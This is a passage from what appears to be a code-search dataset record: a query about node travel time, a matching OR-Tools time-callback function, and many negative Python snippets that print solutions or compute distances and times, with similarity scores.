self.assertFalse(\n response.failed,\n Message('should have run step', response=response)\n )\n\n project = cauldron.project.get_internal_project()\n dom = project.steps[1].dom # type: str\n\n self.assertEqual(\n dom.count(print_string),\n 2,\n 'should have printed ascii lowercase'\n )", "def solution(p, id_):\n out = list()\n run_prog(read_input(), [id_], out)\n print(f\"Solution to part {p}: {out[-1]}\")", "def main():\n\n args = get_args()\n words = args.phrase\n\n words = codify_phrase(words)\n display = ' '.join(words)\n\n print(display)", "def text_output(self):\n print(self.board)\n print()", "def display_results(start, came_from, goal, time, visited_nodes):\n if time == 0:\n print \"No solution found!\"\n solution = reconstruct_path(came_from, start, goal)\n visualize(solution)\n print 'Solution steps: {0}'.format(', '.join(solution_steps(solution))) + '.'\n print 'Time to find solution of the board: {0}'.format(time) + '.'\n print 'Visited nodes: {0}'.format(visited_nodes) + '.'", "def main():\n num_of_tests = int(input())\n\n # iterate over test cases\n for test_case in range(1, num_of_tests + 1):\n result = handle_case()\n printable_result = handle_result(result)\n print(\"Case #{}: {}\".format(test_case, printable_result))", "def completion(state: bool) -> None:\r\n if state:\r\n print(\"Solution is reached. Zero represents marked nodes\")\r\n print_debug(\"checkstate\")\r\n print(\"Preferred output:\")\r\n for y in range(shape):\r\n for x in range(shape):\r\n if example[y, x] == 0:\r\n print(\"X\", end='')\r\n else:\r\n print(example[y, x], end='')\r\n else:\r\n print(\"I'm a big dumb dumb and this is where I am stuck.\")\r\n print(example)\r\n print(\"Conflict Board state:\")\r\n print(conflict_space)\r\n print(\"safeboard state:\")\r\n print(safeboard)\r\n exit()", "def main():\n print \"Printing Sample Status\"", "def show_completed_design(completed_design):\n print(\"\\nThe following models have been printed:\")\n for completed_designs in completed_design:\n print(completed_designs)", "def main():\n logger = logging.getLogger()\n x1 = 2\n y1 = 3\n logger.info('Realizando suma')\n logger.debug('{x} + {y} = '.format(x=x1, y=y1) + str(add(x1, y1)))\n logger.info('Realizando resta')\n logger.debug('{x} - {y} = '.format(x=x1, y=y1) + str(subtract(x1, y1)))\n logger.info('Realizando multiplicación')\n logger.debug('{x} * {y} = '.format(x=x1, y=y1) + str(multiply(x1, y1)))\n logger.info('Realizando división')\n logger.debug('{x} / {y} = '.format(x=x1, y=y1) + str(divide(x1, y1)))\n logger.debug('TERMINADO')\n logger.critical('FAIL')", "def print_solution(data, manager, routing, solution):\r\n time_dimension = routing.GetDimensionOrDie('Time')\r\n total_distance = 0\r\n total_load = 0\r\n total_time = 0\r\n for vehicle_id in range(data['num_vehicles']):\r\n index = routing.Start(vehicle_id)\r\n plan_output = 'Route for vehicle {}:\\n'.format(vehicle_id)\r\n route_distance = 0\r\n route_load = 0\r\n while not routing.IsEnd(index):\r\n node_index = manager.IndexToNode(index)\r\n route_load = route_load + data['demands'][node_index]\r\n time_var = time_dimension.CumulVar(index)\r\n plan_output += ' {0} Load({1}) Time({2},{3}) -> '.format(node_index, route_load,\r\n solution.Min(time_var), solution.Max(time_var))\r\n previous_index = index\r\n index = solution.Value(routing.NextVar(index))\r\n route_distance += routing.GetArcCostForVehicle(previous_index, index, vehicle_id)\r\n time_var = time_dimension.CumulVar(index)\r\n plan_output += ' {0} Load({1}) Time({2},{3})\\n'.format(manager.IndexToNode(index), route_load,\r\n solution.Min(time_var), solution.Max(time_var))\r\n plan_output += 'Distance of the route: {}m\\n'.format(route_distance)\r\n plan_output += 'Load of the route: {}\\n'.format(route_load)\r\n plan_output += 'Time of the route: {}min\\n'.format(solution.Min(time_var))\r\n print(plan_output)\r\n total_distance += route_distance\r\n total_load += route_load\r\n total_time += solution.Min(time_var)\r\n print('Total distance of all routes: {}m'.format(total_distance))\r\n print('Total load of all routes: {}'.format(total_load))\r\n print('Total time of all routes: {}min'.format(total_time))", "def print(self):\n if self.passed():\n self.print_passed()\n else:\n self.print_failed()", "def _doParseSolution(self, st, stdout):\n raise Exception(\"Not implemented\")", "def demo():\n\n # Initialize board with all cells having possible values 1..9\n board = board_init()\n\n # Unsolved demo puzzle\n # Hard puzzle by Arto Inkala:\n # http://abcnews.go.com/blogs/headlines/2012/06/can-you-solve-the-hardest-ever-sudoku/\n read_puzzle(board, \"8..........36......7..9.2...5...7.......457.....1...3...1....68..85...1..9....4..\")\n\n # Print unsolved puzzle\n print(\"Initial Sudoku board:\")\n print_board(board)\n\n # Solve the puzzle\n board = solve_puzzle(board)\n\n # Print the solution\n print(\"Solution:\")\n print_board(board)\n\n\n # Write output to file\n write_to_file(board)\n \n return 0", "def print_summary(self):\n #exec(\"print(storyline.{}_clause+', '+storyline.{}_clause.lower()+', '+storyline.{}_clause.lower())\".format(\"A\", \"B\", \"C\"))\n #exec(\"print(self.{}_clause+', '+self.{}_clause.lower()+', '+self.{}_clause.lower())\".format(\"A\", \"B\", \"C\"))\n lwr = \".lower()\"\n exec(\"print(\"+str(3*(\"self.{}_clause{}+',', \")).format(\"A\",\"\",\"B\",lwr,\"C\",lwr)+\"'\\b\\b')\")", "def main():\n test_problem3()", "def print_solutions(file_):\n with open(file_, 'r') as inp:\n for line in inp:\n print(line[:-5] + str(process_line(line)))", "def preview(problem):\n # Declare problemText first instead of echoing it right away in case the\n # problem does not exist in problems.txt; strip newline from end of text\n problemText = get_problem(problem)[:-1]\n click.secho(\"Project Euler Problem %i\" % problem, bold=True)\n click.echo(problemText)", "def print_output(tree):\n print_value(tree)\n print_tree(tree)", "def print_result(best_instance):\n\n print('Best instance: ')\n print('Generation: ' + str(best_instance.generation))\n print('Instance: ' + str(best_instance.instance))\n print('Fitness: ' + str(round(best_instance.value, 2)))\n print('Phenotype: ' + str(best_instance.phenotype))", "def print_string(self):\n for x in self.minimal:\n print(\"min: %s\" % x)\n for x in self.also_installed:\n print(\"als: %s\" % x)\n for x in self.uninstalled:\n print(\"uni: %s\" % x)", "def OnSolutionCallback(self):\n self.total_plans += 1\n print('Feasible Project Plan #{c}:'.format(c=self.total_plans))\n for idx in range(0, len(self.p_)):\n if self.Value(self.p_vars_[idx]):\n print(' - Project ID: {p} (Cost={c}, Value={v})'.format(\n p=(idx + 1), c=self.p_[idx][4], v=self.p_[idx][3]))\n print(' - Total Cost : {c}'.format(c=self.Value(self.total_cost_)))\n print(' - Total Value : {v}'.format(v=self.Value(self.total_value_)))", "def print_sample(arg_pair: EviPair):\n print('Please think about which argument you '\n 'would prefer in a discussion about: '\n '\\'{}\\' '.format(arg_pair.topic))\n print('First evidence has stance {} : '.format(arg_pair.first_stance))\n print(arg_pair.first_evi)\n print('Second evidence has stance {} : '.format(arg_pair.second_stance))\n print(arg_pair.second_evi)\n print('Enter your choice: ')\n nn_prediction = predict_and_eval(arg_pair)\n print('Neuronal Network selected evidence {}'.format(nn_prediction))\n print('By an acceptance rate of {} sample was labeled as {} \\n'.\n format(arg_pair.acceptance_rate, arg_pair.label))", "def print_examples(self):\n print((\"Examples are not defined for command \" + self.command))", "def main():\n print(\"Everything is ok.\")", "def main():\n\tparser = setup_argument_parser()\n\targuments = parser.parse_args()\n\tto_print = arguments.to_print\n\techo(to_print)", "def debug():\r\n global CurrentState\r\n global CurrentInput\r\n global RESPONSEOPTIONS\r\n print(\"___________________________\")\r\n for state in RESPONSEOPTIONS:\r\n score = calcTotalScore(state, CurrentInput, CurrentState)\r\n print(state.id + \": \" + str(score) + \" ,\", end=\"\")\r\n print(\"\\n___________________________\")", "def test_print_multiple(self):\n response = support.create_project(self, 'omaha')\n self.assertFalse(\n response.failed,\n Message('should have created project', response=response)\n )\n\n code = '\\n'.join([\n 'import cauldron as cd',\n 'import string',\n 'print(string.ascii_lowercase)',\n 'cd.display.text(\"Hello World\")',\n 'print(string.ascii_uppercase)',\n 'print(string.hexdigits)'\n ])\n\n support.add_step(self, contents=code)\n\n response = support.run_command('run -f')\n self.assertFalse(\n response.failed,\n Message('should have run step', response=response)\n )\n\n project = cauldron.project.get_internal_project()\n dom = project.steps[1].dom # type: str\n\n self.assertEqual(\n dom.count(string.ascii_lowercase),\n 1,\n 'should have printed ascii lowercase'\n )\n\n self.assertEqual(\n dom.count(string.ascii_uppercase),\n 1,\n 'should have printed ascii uppercase'\n )\n\n self.assertEqual(\n dom.count(string.hexdigits),\n 1,\n 'should have printed hex digits'\n )", "def textuel_auto():\r\n print()\r\n grids = FileManager.read_sudoku(args.file)\r\n for grid in grids:\r\n print(\"Calcul...\")\r\n print(solver.solve(grid))\r\n print(\"Terminé !\")", "def to_print_out(self):\n self.error_throw('output')\n\n if self.rank_method == methods_of_ranking[3]: #'diversified_ranking'\n self.output_div('print')\n else:\n self.output('print')", "def present_solved_equation(self, result):\n print(\"the result to the equation is:\", result)", "def visualize(solution):\n # Check operating system and give the right clear command\n if os.name == 'nt':\n clear = 'cls'\n else:\n clear = 'clear'\n\n os.system(clear)\n # Loops through the list of Grid objects\n for i in range (len(solution[0]) - 1):\n # prints the solution, waits and than clears the displayed solution\n print (solution[0][i])\n time.sleep(.2)\n os.system(clear)\n\n # prints the final grid\n print solution[0][i + 1]\n return", "def print_sudoku_solution(solution):\n for row in range(9):\n for col in range(9):\n print solution['%d-%d' % (row, col)][0],\n if col == 2 or col == 5:\n print '|',\n print\n if row == 2 or row == 5:\n print '------+-------+------'", "def prompt():\n program_info = ('Dice Rolling Simulator\\n'\n 'Author: Franklin Pinnock\\n'\n 'Language: Python 3.4\\n'\n 'Version: 1.0\\n')\n print(program_info)", "def print_eqn():\n if sys.stdout.encoding.lower().startswith('utf'):\n if JS != 0 and JF != 0:\n print('Eqn: \\u03B8=' + str(np.around(THETA0, decimals=6)) +\n '*sin(2\\u03C0s/' + str(np.around(LAMBDA, decimals=6)) +\n ')\\n +' + str(np.around(THETA0**3, decimals=6)) +\n '*[' + str(np.around(JS, decimals=6)) + '*cos(6\\u03C0s/' +\n str(np.around(LAMBDA, decimals=6)) +\n ')-' + str(np.around(JF, decimals=6)) + '*sin(6\\u03C0s/' +\n str(np.around(LAMBDA, decimals=6)) + ')]')\n elif JS == 0 and JF != 0:\n print('Eqn: \\u03B8=' + str(np.around(THETA0, decimals=6)) +\n '*sin(2\\u03C0s/' + str(np.around(LAMBDA, decimals=6)) +\n ')+' + str(np.around(THETA0**3, decimals=6)) + '*[' + \n '-' + str(np.around(JF, decimals=6)) + '*sin(6\\u03C0s/' +\n str(np.around(LAMBDA, decimals=6)) + ')]')\n elif JS != 0 and JF == 0:\n print('Eqn: \\u03B8=' + str(np.around(THETA0, decimals=6)) +\n '*sin(2\\u03C0s/' + str(np.around(LAMBDA, decimals=6)) +\n ')+' + str(np.around(THETA0**3, decimals=6)) +\n '*[' + str(np.around(JS, decimals=6)) + '*cos(6\\u03C0s/' +\n str(np.around(LAMBDA, decimals=6)) + ')]')\n elif JS == 0 and JF == 0:\n print('Eqn: \\u03B8=' + str(np.around(THETA0, decimals=6)) +\n '*sin(2\\u03C0s/' + str(np.around(LAMBDA, decimals=6)) + ')')\n else:\n if JS != 0 and JF != 0:\n print('Eqn: THETA=' + str(np.around(THETA0, decimals=6)) +\n '*sin(2PI/' + str(np.around(LAMBDA, decimals=6)) +\n ')\\n +' + str(np.around(THETA0**3, decimals=6)) +\n '*[' + str(np.around(JS, decimals=6)) + '*cos(6PI/' +\n str(np.around(LAMBDA, decimals=6)) +\n ')-' + str(np.around(JF, decimals=6)) + '*sin(6PI/' +\n str(np.around(LAMBDA, decimals=6)) + ')]')\n elif JS == 0 and JF != 0:\n print('Eqn: THETA=' + str(np.around(THETA0, decimals=6)) +\n '*sin(2PI/' + str(np.around(LAMBDA, decimals=6)) +\n ')+' + str(np.around(THETA0**3, decimals=6)) + '*[' + \n '-' + str(np.around(JF, decimals=6)) + '*sin(6PI/' +\n str(np.around(LAMBDA, decimals=6)) + ')]')\n elif JS != 0 and JF == 0:\n print('Eqn: THETA=' + str(np.around(THETA0, decimals=6)) +\n '*sin(2PI/' + str(np.around(LAMBDA, decimals=6)) +\n ')+' + str(np.around(THETA0**3, decimals=6)) +\n '*[' + str(np.around(JS, decimals=6)) + '*cos(6PI/' +\n str(np.around(LAMBDA, decimals=6)) + ')]')\n elif JS == 0 and JF == 0:\n print('Eqn: THETA=' + str(np.around(THETA0, decimals=6)) +\n '*sin(2PI/' + str(np.around(LAMBDA, decimals=6)) + ')')", "def print_answer(answer):\n print(\"-\" * 40)\n print(u\"Answer: \" + answer)\n print(\"-\" * 40)", "def print_intro(self):\n \n print('Did you know mammals tend to have the shortest migration routes because walking takes more energy than flying or swimming?')", "def printInfo():\n print('\\t' * 6 + 'Combinational Circuit Paths')\n\n print('-' * 75)\n\n print('Input: Verilog file with Gate Level Modelling')\n print('Output: All paths from input to output of the circuit described by the Verilog file')\n print('(Optional: Graph of the circuit can also be exported)')\n\n print('-' * 75, end='\\n\\n')", "def display_sol(sol, node_list, v_src_list):\n\n print(\"\\n\")\n node_list = node_list[1:]\n for i in range(len(node_list)):\n print(\"V_\" + node_list[i] + \": \", ffs(np.real(sol[i]), precision=5), '+', ffs(np.imag(sol[i]), precision=5)+'j')\n\n for i in range(len(v_src_list)):\n v = v_src_list[i]\n print(\"I_\" + v.name + \": \", ffs(np.real(sol[len(node_list)+i]), precision=5), '+', ffs(np.imag(sol[len(node_list)+i]), precision=5)+'j')\n print(\"\\n\")", "def print_solution(data, manager, routing, assignment):\r\n total_distance = 0\r\n total_load = 0\r\n for vehicle_id in range(data['num_vehicles']):\r\n index = routing.Start(vehicle_id)\r\n plan_output = 'Route for vehicle {}:\\n'.format(vehicle_id+1)\r\n route_distance = 0\r\n route_load = 0\r\n while not routing.IsEnd(index):\r\n node_index = manager.IndexToNode(index)\r\n route_load += data['demands'][node_index]\r\n plan_output += ' {0} Load({1}) -> '.format(node_index, route_load)\r\n previous_index = index\r\n index = assignment.Value(routing.NextVar(index))\r\n route_distance += routing.GetArcCostForVehicle(\r\n previous_index, index, vehicle_id)\r\n plan_output += ' {0} Load({1})\\n'.format(manager.IndexToNode(index),\r\n route_load)\r\n plan_output += 'Distance of the route: {}m\\n'.format(route_distance)\r\n plan_output += 'Load of the route: {}\\n'.format(route_load)\r\n print(plan_output)\r\n total_distance += route_distance\r\n total_load += route_load\r\n print('Total distance of all routes: {}m'.format(total_distance))\r\n print('Total load of all routes: {}'.format(total_load))" ]
[ "0.87028384", "0.74389744", "0.7377259", "0.708527", "0.7000077", "0.69975126", "0.69795585", "0.6975123", "0.6821493", "0.6821493", "0.6821493", "0.6735901", "0.6602481", "0.65324736", "0.65144485", "0.64514583", "0.64233005", "0.64180934", "0.63984954", "0.6382045", "0.63810366", "0.63747376", "0.63657063", "0.6355313", "0.63523686", "0.63432306", "0.63385713", "0.6320839", "0.6317033", "0.6307986", "0.62988347", "0.6258159", "0.62496424", "0.622919", "0.6209604", "0.62061924", "0.61834973", "0.61750245", "0.6169629", "0.61598605", "0.61432344", "0.61327976", "0.61011255", "0.60697436", "0.60292894", "0.6017365", "0.5993325", "0.59843487", "0.59632885", "0.5959098", "0.59304446", "0.5923987", "0.5916208", "0.5908206", "0.5904342", "0.58973473", "0.589689", "0.589034", "0.5890035", "0.58784884", "0.58726645", "0.5837811", "0.58338034", "0.58322775", "0.5827711", "0.5827091", "0.5825254", "0.5824642", "0.5821064", "0.58191955", "0.5816615", "0.58127373", "0.58062494", "0.5800548", "0.57777345", "0.5773076", "0.5770662", "0.57542014", "0.57541573", "0.5753299", "0.57495546", "0.5749017", "0.5747906", "0.5739722", "0.57252926", "0.57242846", "0.57207495", "0.5714662", "0.5710271", "0.57075006", "0.57051307", "0.56938803", "0.5690099", "0.56900334", "0.5684113", "0.56819105", "0.56731457", "0.56726223", "0.56698406", "0.565995" ]
0.5708058
89
Returns the travel time between the two nodes.
def time_callback(from_index, to_index): # Convert from routing variable Index to time matrix NodeIndex. from_node = manager.IndexToNode(from_index) to_node = manager.IndexToNode(to_index) return self.data['time_matrix'][from_node][to_node]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def nodes_time(self):\n return self._nodes_time", "def _node_distance(self, first, second):\r\n\r\n name_1 = first.name.split(' ')[0]\r\n name_2 = second.name.split(' ')[0]\r\n\r\n seq1 = self.msa_by_name[name_1]\r\n seq2 = self.msa_by_name[name_2]\r\n\r\n distance = self._seq_distance(seq1, seq2)\r\n\r\n return distance", "def ComputeLightTravelTime(Det1Pos, Det2Pos):\n\n # Get relative position vector\n Det21Pos = Det2Pos - Det1Pos\n \n # Dot difference vector into itself to get magnitude of detector separation\n dist = np.sqrt(np.dot(Det21Pos,Det21Pos))\n\n # Normalise with speed of light\n travelTime = dist/c\n\n return travelTime", "def get_time_walking(self):\n return self.time_step_to_enqueue - self.time_entered", "def get_propagation_time(self):\n return 0.0 # self.get_distance_to_gateway() / (3 * pow(10,8))", "def node_distance(self, node1, node2):\n if node1 == node2:\n return 0.0\n for i, (n1, n2) in enumerate(zip(self.paths[node1], self.paths[node2])):\n if n1 != n2:\n break\n else:\n i = min(len(self.paths[node1]), len(self.paths[node2]))\n return sum(self.path_dists[node1][i:]) + sum(self.path_dists[node2][i:])", "def get_traveltime(self, edge):\n\n return self.graph[edge[0]][edge[1]][\"traveltime\"]", "def compute_travel_time(start_id, dest_id, csv, G):\n \n # route is not computed yet\n if csv[start_id][dest_id] is None:\n return -1\n\n travel_time = 0\n cur_node_id = start_id\n\n while cur_node_id != dest_id:\n \n # get the next node on this route\n next_node_id = csv[cur_node_id][dest_id]\n\n # update the travel time\n edge = G.get_edge_data(cur_node_id, next_node_id)\n travel_time += edge[0]['travel_time']\n\n cur_node_id = next_node_id\n\n return travel_time", "def duration(self):\r\n return self.t2 - self.t1", "def path_time(self, path):\n\n time = 0\n for edge in path:\n time += self.graph[edge[0]][edge[1]][\"traveltime\"]\n\n return time", "def dist(self, node_0, node_1):\n coord_0, coord_1 = self.coords[node_0], self.coords[node_1]\n return math.sqrt((coord_0[0] - coord_1[0]) ** 2 + (coord_0[1] - coord_1[1]) ** 2)", "def service_time(self):\r\n #print self.node_monitor_address, self.completion_time - self.node_monitor_launch_time\r\n return (self.completion_time - self.node_monitor_launch_time)", "def travel_time(self, origin, destination):\n assert 2 <= len(origin) <= 3, \"Origin should by (x, y) or (x, y, z)\"\n assert 2 <= len(destination) <= 3, \"Origin should by (x, y) or (x, y, z)\"\n assert len(origin) == len(destination), \"Elevation should be present in origin and destination or absent in both\"\n if len(origin) == 2:\n xo, yo = origin\n xd, yd = destination\n zo = zd = 0\n else:\n assert len(origin) == 3\n xo, yo, zo = origin\n xd, yd, zd = destination\n\n ground_distance = np.sqrt((xd-xo)**2 + (yd-yo)**2)\n elevation_diff = zd - zo\n if elevation_diff >= 0:\n return max(ground_distance / self.max_airspeed, elevation_diff / self.max_rate_of_climb)\n else:\n return max(ground_distance / self.max_airspeed, -elevation_diff / self.max_rate_of_descent)", "def compute_distance(node1, node2):\n return np.linalg.norm(node1 - node2)", "def round_trip_time(self):\r\n return self.completion_time - self.launch_time", "def ref_time(self) -> float:\n return ntp_to_system_time(self.ref_timestamp)", "def arrival_time(self):\r\n return self.__arrival_time", "def arrival_time(self):\r\n return self.__arrival_time", "def time_for_travel(self):\n return great_circle(self.pickupcoords, self.dropoffcoords).miles * 3600 / 25", "def dest_time(self) -> float:\n return ntp_to_system_time(self.dest_timestamp)", "def get_elapsed_time(self):\n if hasattr(self, 'starttime'):\n return monotonic() - self.starttime\n else:\n return 0", "def calculate_travel_time_simple(distance_meters, accel_mps2):\n time = math.sqrt(4 * distance_meters / accel_mps2)\n speed = accel_mps2 * time * 0.5\n return [time, speed]", "def time_left(self):\n t=self.transport\n return (t.stoptime or t.get_length())-t.get_time()", "def virtual_time(self):\n return (_time.time() - PROTOCOL_START_TIME) / ROUND_DURATION", "def getTokenDistance(self, node1, node2):\n txt = self.getText()\n if node1 < node2:\n start = node1.getSpan()[1]+1\n end = node2.getSpan()[0]\n direction = 1\n else:\n start = node2.getSpan()[1]+1\n end = node1.getSpan()[0]\n direction = -1\n\n sub_txt = txt[start:end]\n tokens = sub_txt.split()\n return len(tokens)*direction", "def set_destination(self):\n # TODO: consider new implementation with multiple paths possible.\n self.destination = self.network[self.current_node]['next']\n lead_time = self.network[self.current_node]['path'].lead_time\n return datetime.timedelta(hours=lead_time)", "def elapsed_time(self) -> float:\n current_time = datetime.utcnow()\n start = self.start_time or current_time\n end = self.end_time or current_time\n return (end - start).total_seconds()", "def _arrival_time(self):\n \n return self.mkt_time + timedelta(0, 0, self.latency)", "def service_time(self):\r\n return (self.completion_time - self.node_monitor_launch_time)", "def getTime(self) -> float:\n return self.t", "def compute_start_and_finish_times(a, n_t, current_time):\n duration = n_t.getc()\n speed = a.getv()\n current_location = a.getz()\n task_loc = n_t.getloc()\n dist = np.sqrt((task_loc[0] - current_location[0]) ** 2 + (task_loc[1] - current_location[1]) ** 2)\n travel_time = dist / speed\n start_time = current_time + travel_time\n finish_time = start_time + duration\n return start_time, finish_time", "def recv_time(self) -> float:\n return ntp_to_system_time(self.recv_timestamp)", "def get_time_diff(start_time_ms: int) -> float:\n end_time_ms = RemoteProvisionerBase.get_current_time()\n time_diff = float((end_time_ms - start_time_ms)/1000)\n return time_diff", "def time_difference(time1: Time, time2: Time) -> float:\n dsec = time1.sec - time2.sec\n dnanosec = time1.nanosec - time2.nanosec\n dt = dsec + dnanosec/(10**9)\n return dt", "def time():\n master = MasterTimer.getMasterTimer()\n\n if master.end_time:\n return master.end_time - master.start_time\n else:\n return time.time() - master.start_time", "def get_time(self) -> float:\n raise NotImplementedError()", "def get_duration(self, current_time):\n return current_time - self.slam.get_data(node_name=self.last_point_name)['time']", "def get_time(self) -> float:\n self.rocket.update()\n return self.rocket.time", "def time(self):\n return _cantera.reactornet_time(self.__reactornet_id)", "def get_speed_cost(data, start_node_id, end_node_id):\n start_node = data[start_node_id]\n dist_cost = get_dist_cost(data, start_node_id, end_node_id)\n # Get the speed limit along the way that connects the starting and ending nodes\n speed_limit_between_nodes = start_node['adjacent'][end_node_id]\n return dist_cost / speed_limit_between_nodes # Cost = Time = Distance/Rate", "def time(self):\n return self._clock() - self._starttime", "def tx_time(self) -> float:\n return ntp_to_system_time(self.tx_timestamp)", "def distance_between(self, first_node_object, second_node_object):\n\n (first_column, first_row) = first_node_object\n (second_column, second_row) = second_node_object\n\n return numpy.sqrt((first_row - second_row) ** 2 +\n (first_column - second_column) ** 2)", "def calculate_manhattan(node_a, node_b):\n return (abs(node_a.x - node_b.x) + abs(node_a.y - node_b.y))", "def time(self) -> float:\n return self.sim_scene.data.time", "def get_time(self):\n return self._total_time", "def response_time(self):\r\n if self.__arrival_time == INVALID_TIME:\r\n self.__logger.debug(\"Request %s missing arrival time\" % self.__id)\r\n return INVALID_TIME_DELTA\r\n completion_time = self.__arrival_time\r\n for task_id, task in self.__tasks.items():\r\n if task.completion_time == INVALID_TIME:\r\n self.__logger.debug((\"Task %s in request %s missing completion \"\r\n \"time\") % (task_id, self.__id))\r\n return INVALID_TIME_DELTA\r\n task_completion_time = task.adjusted_completion_time()\r\n #if task.scheduler_launch_time > task.node_monitor_launch_time:\r\n #self.__logger.warn((\"Task %s suggests clock skew: scheduler launch time %d, node \"\r\n # \"monitor launch time %d\") %\r\n\r\n #(task_id, task.scheduler_launch_time,\r\n # task.node_monitor_launch_time))\r\n completion_time = max(completion_time, task_completion_time)\r\n return completion_time - self.__arrival_time", "def to(addr1, addr2):\n directions_result = gmaps.directions(addr1,\n addr2,\n mode=\"transit\",\n alternatives=True)\n\n best,besti = mini(map(calc_time, directions_result), key=lambda x: x[0])\n return best", "def distanceTwoPoints(self,A,B):\n #productive\n # used by addNeedleToScene\n profprint()\n length = ( (A[0]-B[0])**2 + (A[1]-B[1])**2 + (A[2]-B[2])**2 ) ** 0.5\n return length", "def calculate_heuristic(node1, node2):\n return abs(node1.x - node2.x) + abs(node1.y - node2.y)", "def allocation_state_transition_time(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"allocation_state_transition_time\")", "def distance(self, first, second):\r\n if not((0 <= first < self.size) and (0 <= second < self.size)):\r\n raise ValueError(\"Cannot find distances for nodes not in the graph\")\r\n if first == second:\r\n return 0\r\n dist_tracker = self._perform_dijkstra(first, second)\r\n return dist_tracker.get_min_distance(second)", "def distanceBetween(nodeOneName, nodeTwoName, nodeDatabase):\n\n\tnodeOnePair = getCoords(nodeOneName, nodeDatabase)\n\tnodeTwoPair = getCoords(nodeTwoName, nodeDatabase)\n\n\tif (nodeOnePair == None) or (nodeTwoPair == None):\n\t\traise NameError, \"Unknown node requested, either %s or %s.\" % (nodeOneName, nodeTwoName)\n\n\t(x1, y1) = nodeOnePair\n\t(x2, y2) = nodeTwoPair\n\n\txPair = pow(x1 - x2, 2)\n\tyPair = pow(y1 - y2, 2)\n\n\tdist = sqrt(xPair + yPair)\n\n\treturn dist", "def time_diff(dt1, dt2):\n return abs(int((dt2 - dt1).total_seconds()))", "def get_distance_between_nodes(G, path, subpath1, subpath2):\r\n if subpath1 + subpath2 == path:\r\n node1 = str(subpath1[-1])\r\n node2 = str(subpath2[0])\r\n elif subpath2 + subpath1 == path:\r\n node1 = str(subpath2[-1])\r\n node2 = str(subpath1[0])\r\n else:\r\n raise ValueError(\"Subpath1 and subpath2 passed do not form path\")\r\n return G[node1][node2]['distance']", "def calc_distance(first: Waypoint, second: Waypoint) -> int:\n return int(distance.vincenty(first.coords(), second.coords()).m)", "def get_distance_between(\n node1,\n node2,\n distance_between=False,\n bounding_box=False,\n rotate_pivot=False,\n):\n if distance_between:\n dist = cmds.createNode(\"distanceBetween\")\n cmds.connectAttr(node1 + \".worldMatrix[0]\", dist + \".inMatrix1\")\n cmds.connectAttr(node2 + \".worldMatrix[0]\", dist + \".inMatrix2\")\n value = cmds.getAttr(dist + \".distance\")\n cmds.delete(dist)\n return value\n\n if bounding_box:\n node1 = cmds.xform(\n node1, query=True, bounding_box=True, worldSpace=True\n )\n node2 = cmds.xform(\n node2, query=True, bounding_box=True, worldSpace=True\n )\n\n elif rotate_pivot:\n node1 = cmds.xform(\n node1, query=True, worldSpace=True, rotate_pivot=True\n )\n node2 = cmds.xform(\n node2, query=True, worldSpace=True, rotate_pivot=True\n )\n\n else:\n node1 = cmds.xform(\n node1, query=True, translation=True, worldSpace=True\n )\n node2 = cmds.xform(\n node2, query=True, translation=True, worldSpace=True\n )\n\n value = (\n (node1[0] - node2[0]) ** 2\n + (node1[1] - node2[1]) ** 2\n + (node1[2] - node2[2]) ** 2\n ) ** 0.5\n\n return value", "def get_time(cls):\n now = rospy.Time.now()\n return now.secs + now.nsecs*(10**-9) # time in seconds", "def compareNodes(x, y):\n return x.pathValue - y.pathValue", "def get_nodes_distance(dbpath,node1,node2,inst,stepname,nframe=-1):\n odb = openOdb(path=dbpath)\n _inst = odb.rootAssembly.instances[inst]\n ic = odb.rootAssembly.instances[inst].nodes\n us = odb.steps[stepname].frames[nframe].fieldOutputs['U'].getSubset(region=_inst).values\n xx1 = ic[node1-1].coordinates[0]+us[node1-1].data[0]\n yy1 = ic[node1-1].coordinates[1]+us[node1-1].data[1]\n xx2 = ic[node2-1].coordinates[0]+us[node2-1].data[0]\n yy2 = ic[node2-1].coordinates[1]+us[node2-1].data[1]\n if _inst.embeddedSpace == THREE_D:\n zz1 = ic[node1-1].coordinates[2]+us[node1-1].data[2]\n zz2 = ic[node2-1].coordinates[2]+us[node2-1].data[2]\n d = np.sqrt((xx2-xx1)**2 + (yy2-yy1)**2 + (zz2-zz1)**2)\n else:\n d = np.sqrt((xx2-xx1)**2+(yy2-yy1)**2)\n return d", "def get_length(self) -> np.float64:\n\n return np.float64(\n sqrt(\n (self.node1.x - self.node2.x) ** 2\n + (self.node1.y - self.node2.y) ** 2\n )\n )", "def inter_arrival_times(self):\n # this function returns arrival times between two subsequent tuples in ms\n # task mean_inter_arrival_time std_inter_arrival_time\n if self.inter_arrival_time is None:\n if self.tuple_arrival is None:\n self.tuple_arrivals()\n self.inter_arrival_time = convert_throughput_to_inter_arr_times(self.tuple_arrival)\n\n return self.inter_arrival_time", "def get_walk_to_target_duration(self):\n return self._walk_to_target_duration", "def getTime(self):\n return _osgAnimation.Motion_getTime(self)", "def print_train_time(start: float, end: float, device: torch.device = None):\n total_time = end - start\n print(f\"Train time on {device}: {total_time:.3f} seconds\")\n return total_time", "def rt_dep_time(self):\n return self._rt_dep_time", "def getWaypointTravelTime(self, waypoints, id_tm1, id_t):\n # Validate inputs\n if (not waypoints\n or len(waypoints) < 2\n or id_tm1 is None\n or id_t is None\n or id_tm1 < 0 or id_tm1 >= len(waypoints)\n or id_t < 0 or id_t >= len(waypoints)\n or self.speed_avg <= 0):\n # Invalid inputs\n return None\n\n waypoint_t = waypoints[id_t]\n waypoint_tm1 = waypoints[id_tm1]\n waypoint_dist = waypoint_tm1.distanceTo(waypoint_t)\n speed_avg_fps = knotsToFeetPerSecond(self.speed_avg)\n waypoint_travel_time = waypoint_dist / speed_avg_fps\n\n return waypoint_travel_time", "def getDeliveryTime(ori, dest):\n\n start_time = time.time()\n\n routingApi = herepy.RoutingApi(os.getenv(\"HERE_KEY\"))\n gm = GoogleMaps(os.getenv(\"GOOGLE_KEY\"))\n\n try:\n response = routingApi.truck_route(ori.coords[::-1], dest.coords[::-1], [herepy.RouteMode.truck, herepy.RouteMode.fastest]).as_dict()\n distance = response.get('response').get('route')[0].get('summary').get('distance') / 1000\n except herepy.error.HEREError:\n try:\n response = gm.distance_matrix(ori.coords[::-1], dest.coords[::-1], mode=\"driving\", departure_time=dt.datetime.now(), traffic_model=\"pessimistic\")\n distance = response.get('rows')[0].get('elements')[0].get('distance').get('value') / 1000\n except Exception as e:\n capture_exception(e)\n raise e\n\n if distance < 51:\n deltime = 6\n elif distance > 50 and distance < 701:\n deltime = 24\n elif 